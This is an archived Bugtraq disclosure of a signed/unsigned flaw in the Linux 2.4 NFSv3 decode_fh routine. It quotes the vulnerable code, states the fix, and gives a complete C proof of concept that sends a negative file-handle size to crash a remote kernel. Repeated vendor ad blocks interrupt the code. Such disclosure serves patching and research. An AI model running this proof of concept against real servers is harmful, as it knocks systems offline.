VL: Remote Linux Kernel < 2.4.21 DoS in XDR routine.

Why the fsck this was keeped in silence? Damn the leenox devteam :P

-----Orginal-----
From: Jared Stanbrough [mailto:jareds@pdx.edu] To: bugtraq@securityfocus.com
Subject: Remote Linux Kernel < 2.4.21 DoS in XDR routine.

Hello all,

I have discovered a signed/unsigned issue in a routine responsible for demarshalling XDR data for NFSv3 procedure calls. As far as I can tell, this bug has existed since NFSv3 support was integrated. It has been silently fixed in 2.4.21.

The bug is in the decode_fh routine of fs/nfsd/nfs3xdr.c under the kernel source tree.

Vulnerable code:

static inline u32 *
decode_fh(u32 *p, struct svc_fh *fhp)
{

        int size;
        fh_init(fhp, NFS3_FHSIZE);
        size = ntohl(*p++);
        if (size > NFS3_FHSIZE)
                return NULL;

        memcpy(&fhp->fh_handle.fh_base, p, size);
        fhp->fh_handle.fh_size = size;
        return p + XDR_QUADLEN(size);

Where p is a packet of attacker controlled XDR data. If size is made to be negative, the sanity check is passed and the malicious value is passed to memcpy. Due to the behavior of the kernel's memcpy, this will cause a very large copy in kernel space, resulting in an instant kernel panic.

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

The attached code is a POC of this vulnerability. It requires that the vulnerable host has an exported directory available to the attacker. This is probably not the only way to manifest this bug, however.

If you have any questions, please feel free to contact me.

Cheers,

Jared Stanbrough <jareds@pdx.edu>

/*
  Linux 2.4.x knfsd kernel signed/unsigned decode_fh DoS   Author: jared stanbrough <jareds@pdx.edu>   Date: 07/19/2003   

  Vulnerable code: (fs/nfsd/nfs3xdr.c line 52-64)

  static inline u32 *
  decode_fh(u32 *p, struct svc_fh *fhp)
  {

        int size;
        fh_init(fhp, NFS3_FHSIZE);
        size = ntohl(*p++);
        if (size > NFS3_FHSIZE)
                return NULL;   

        memcpy(&fhp->fh_handle.fh_base, p, size);
        fhp->fh_handle.fh_size = size;
        return p + XDR_QUADLEN(size);

Do you need more help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

  This code is called by quite a few XDR decoding routines. The below   POC demonstrates the vulnerability by encoding a malicious fhsize   at the beginning of a diroparg xdr argument.  

  To test this, the vulnerable host must have an accessible exported   directory which was previously mounted by the attacker. _HOWEVER_   it may be possible to trigger this bug by some other method.

  Fix: Simply change size to an unsigned int, or check for size < 0. */

#include <rpcsvc/nfs_prot.h>
#include <rpc/rpc.h>
#include <rpc/xdr.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>

#define NFSPROG 100003
#define NFSVERS 3
#define NFSPROC_GETATTR 1

static struct diropargs heh;

bool_t xdr_heh(XDR *xdrs, diropargs *heh) {
  int32_t werd = -1;
  return xdr_int32_t(xdrs, &werd);
}

int main(void)
{
  CLIENT * client;
  struct timeval tv;

Can we help you?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

  client = clnt_create("marduk", NFSPROG, NFSVERS, "udp");   

  if(client == NULL) {

      perror("clnt_create\n");
  }

  tv.tv_sec = 3;
  tv.tv_usec = 0;
  client->cl_auth = authunix_create_default();

  clnt_call(client, NFSPROC_GETATTR, (xdrproc_t) xdr_heh, (char *)&heh,

            (xdrproc_t) xdr_void, NULL, tv);

  return 0;
}      Received on Wed Jul 30 15:45:03 2003